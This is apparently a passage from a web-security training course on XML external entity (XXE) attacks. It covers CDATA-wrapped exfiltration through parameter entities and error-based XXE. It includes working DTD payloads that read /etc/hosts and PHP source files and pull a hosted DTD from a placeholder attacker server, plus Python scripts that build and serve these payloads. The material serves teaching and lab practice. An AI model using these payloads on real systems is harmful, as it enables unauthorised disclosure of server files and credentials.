Advanced Exfiltration with CDATA

For PHP web apps, we can use PHP filters to encode and read source files.

But what about other types of web apps?

To output data that does not conform to the XML format, we can wrap the content of the external file reference in a CDATA section (e.g. <![CDATA[ FILE_CONTENT ]]>).

This way, the XML parser treats that part as raw character data, which may contain any characters, including special ones such as < and &. The only sequence that cannot appear inside it is ]]>, which ends the section.
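As a quick local illustration of why the CDATA wrapper matters, the sketch below feeds the same text to Python's standard xml.etree.ElementTree parser with and without the wrapper. The sample file_content string and the <email> element are assumptions chosen for the demonstration, and nothing here contacts a target.

```python
import xml.etree.ElementTree as ET

# Hypothetical file content containing characters that are illegal in raw XML text.
file_content = 'if ($a < 1 && $b) { echo "<b>"; }'


def parses(xml_text):
    """Return True if xml_text is well-formed XML, False otherwise."""
    try:
        ET.fromstring(xml_text)
        return True
    except ET.ParseError:
        return False


plain = "<email>" + file_content + "</email>"
wrapped = "<email><![CDATA[" + file_content + "]]></email>"

plain_ok = parses(plain)        # the bare "<" and "&" break the parser
wrapped_ok = parses(wrapped)    # the CDATA section is accepted as raw data
recovered = ET.fromstring(wrapped).text

print(plain_ok, wrapped_ok, recovered == file_content)
```

The unwrapped document is rejected, while the wrapped one parses and returns the original text unchanged.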

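A simple first attempt is to define one internal entity holding the start of the CDATA section, another holding its end, and place the external file entity between them:

<!DOCTYPE email [
  <!ENTITY begin "<![CDATA[">
  <!ENTITY file SYSTEM "file:///var/www/html/submitDetails.php">
  <!ENTITY end "]]>">
  <!ENTITY joined "&begin;&file;&end;">
]>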

After that, if we reference the &joined; entity, it should contain our escaped data. However, this will not work, since XML prevents joining internal and external entities, so we need another approach.

To bypass this limitation, we can utilize XML Parameter Entities, a special type of entity that starts with a % character and can only be used within the DTD. What’s unique about parameter entities is that if we reference them from an external source (e.g., our own server), then all of them would be considered as external and can be joined, as follows:

<!ENTITY joined "%begin;%file;%end;">

So, let’s try to read the submitDetails.php file by first storing the above line in a DTD file (e.g. xxe.dtd), hosting it on our machine, and then referencing it as an external entity on the target web application, as follows:

jadu101@htb[/htb]$ echo '<!ENTITY joined "%begin;%file;%end;">' > xxe.dtd
jadu101@htb[/htb]$ python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
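Before sending the payload, it can help to confirm that the DTD is actually reachable over HTTP. The following is a minimal sketch, assuming a throwaway local setup: it writes the same xxe.dtd line to a temporary directory, serves it on a random loopback port, and fetches it back. The helper name serve_and_fetch is hypothetical, and the loopback address stands in for OUR_IP.

```python
import functools
import http.server
import tempfile
import threading
import urllib.request
from pathlib import Path

# Same content that the echo command above writes (echo appends the newline).
DTD_LINE = '<!ENTITY joined "%begin;%file;%end;">\n'


def serve_and_fetch(directory, name="xxe.dtd"):
    """Serve `directory` on a random loopback port and fetch `name` once."""
    handler = functools.partial(
        http.server.SimpleHTTPRequestHandler, directory=str(directory)
    )
    server = http.server.ThreadingHTTPServer(("127.0.0.1", 0), handler)
    thread = threading.Thread(target=server.serve_forever, daemon=True)
    thread.start()
    try:
        port = server.server_address[1]
        # Ignore any proxy settings so the request goes straight to loopback.
        opener = urllib.request.build_opener(urllib.request.ProxyHandler({}))
        with opener.open(f"http://127.0.0.1:{port}/{name}", timeout=5) as resp:
            return resp.read().decode()
    finally:
        server.shutdown()
        server.server_close()


with tempfile.TemporaryDirectory() as tmp:
    Path(tmp, "xxe.dtd").write_text(DTD_LINE)
    fetched = serve_and_fetch(tmp)

print(fetched, end="")
```

If the fetched text matches the line we wrote, the target should receive the same DTD when it resolves the external entity, provided it can reach our machine.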

Now, we can reference our external entity (xxe.dtd) and then print the &joined; entity we defined above, which should contain the content of the submitDetails.php file, as follows:

<!DOCTYPE email [
  <!ENTITY % begin "<![CDATA["> <!-- prepend the beginning of the CDATA tag -->
  <!ENTITY % file SYSTEM "file:///var/www/html/submitDetails.php"> <!-- reference external file -->
  <!ENTITY % end "]]>"> <!-- append the end of the CDATA tag -->
  <!ENTITY % xxe SYSTEM "http://OUR_IP:8000/xxe.dtd"> <!-- reference our external DTD -->
  %xxe;
]>
...
<email>&joined;</email> <!-- reference the &joined; entity to print the file content -->
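When testing several files, it may be convenient to generate the payload above rather than edit it by hand. This is only a sketch: build_cdata_payload is a hypothetical helper, the body is reduced to a single <email> element, and any other elements the real request needs (elided as ... above) would still have to be added.

```python
def build_cdata_payload(attacker_host, target_file, port=8000):
    """Build the DOCTYPE block and <email> element for the CDATA technique.

    attacker_host: address of the machine hosting xxe.dtd (OUR_IP above)
    target_file:   absolute path of the file to read on the target
    """
    return (
        "<!DOCTYPE email [\n"
        '  <!ENTITY % begin "<![CDATA[">\n'
        f'  <!ENTITY % file SYSTEM "file://{target_file}">\n'
        '  <!ENTITY % end "]]>">\n'
        f'  <!ENTITY % xxe SYSTEM "http://{attacker_host}:{port}/xxe.dtd">\n'
        "  %xxe;\n"
        "]>\n"
        "<email>&joined;</email>"
    )


payload = build_cdata_payload("OUR_IP", "/var/www/html/submitDetails.php")
print(payload)
```

Keeping the host and file path as parameters means only one argument changes between attempts.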

Once we write our xxe.dtd file, host it on our machine, and add the above lines to our HTTP request to the vulnerable web application, the response finally contains the content of the submitDetails.php file.

(Screenshot: php_cdata)

Error Based XXE

If the web app does not write any of our XML input to its output, we are blind to the result of the XXE.

If the web application displays runtime errors (e.g., PHP errors) and does not have proper exception handling for the XML input, then we can use this flaw to read the output of the XXE exploit.

Let’s say none of the XML input entities are displayed on the screen.

We first try sending malformed XML data and see if the web app displays any errors.

To do so, we can delete one of the closing tags or change one of them so that it no longer closes its element (e.g. <roo> instead of <root>).
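To see what kind of error a broken closing tag produces, the malformed body can be checked locally first. The sketch below assumes a hypothetical request body with a <root> element wrapping <email>, and uses Python's standard parser; the target's own parser will word its error differently.

```python
import xml.etree.ElementTree as ET

# Hypothetical well-formed request body; the real element names may differ.
well_formed = "<root><email>test@example.com</email></root>"

# Break the document by renaming the final closing tag.
malformed = well_formed.replace("</root>", "</roo>")


def parse_error(xml_text):
    """Return the parser's error message, or None if the XML is well-formed."""
    try:
        ET.fromstring(xml_text)
        return None
    except ET.ParseError as exc:
        return str(exc)


ok_error = parse_error(well_formed)
bad_error = parse_error(malformed)

print(ok_error)
print(bad_error)
```

If the web application echoes a comparable parser error back to us, that is the channel the error-based technique relies on.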

When we do that, the web app returns an error that reveals the web server directory, which we can use to read the source code of other files.

Let’s exploit this flaw and read file content.

We will first host a DTD file that contains the following payload:

<!ENTITY % file SYSTEM "file:///etc/hosts">
<!ENTITY % error "<!ENTITY content SYSTEM '%nonExistingEntity;/%file;'>">

The above payload defines the file parameter entity and then joins it with an entity that does not exist. In our previous exercise, we were joining three strings. In this case, %nonExistingEntity; does not exist, so the web application would throw an error saying that this entity does not exist, along with our joined %file; as part of the error. There are many other variables that can cause an error, like a bad URI or having bad characters in the referenced file.

Now, we can call our external DTD script, and then reference the error entity, as follows:

<!DOCTYPE email [ 
  <!ENTITY % remote SYSTEM "http://OUR_IP:8000/xxe.dtd">
  %remote;
  %error;
]>
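The two pieces of the error-based attack (the hosted DTD and the request payload) can be generated together so that they stay in sync. This is a sketch under the same assumptions as above: build_error_dtd and build_error_payload are hypothetical helper names, and OUR_IP and port 8000 are placeholders taken from the examples in this section.

```python
def build_error_dtd(target_file):
    """Return the DTD text to host; it references a non-existing entity on purpose."""
    return (
        f'<!ENTITY % file SYSTEM "file://{target_file}">\n'
        "<!ENTITY % error \"<!ENTITY content SYSTEM "
        "'%nonExistingEntity;/%file;'>\">\n"
    )


def build_error_payload(attacker_host, port=8000, dtd_name="xxe.dtd"):
    """Return the DOCTYPE block that loads the remote DTD and triggers the error."""
    return (
        "<!DOCTYPE email [\n"
        f'  <!ENTITY % remote SYSTEM "http://{attacker_host}:{port}/{dtd_name}">\n'
        "  %remote;\n"
        "  %error;\n"
        "]>"
    )


dtd_text = build_error_dtd("/etc/hosts")
payload = build_error_payload("OUR_IP")

print(dtd_text)
print(payload)
```

To read a different file, only the argument to build_error_dtd changes; the request payload stays the same.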

Once we host our DTD script as we did earlier and send the above payload as our XML data (no need to include any other XML data), the error message returned by the web application includes the content of the /etc/hosts file.

(Screenshot: exfil_error)

This method may also be used to read the source code of files. All we have to do is change the file name in our DTD script to point to the file we want to read (e.g. "file:///var/www/html/submitDetails.php"). However, this method is not as reliable as the previous method for reading source files, as it may have length limitations, and certain special characters may still break it.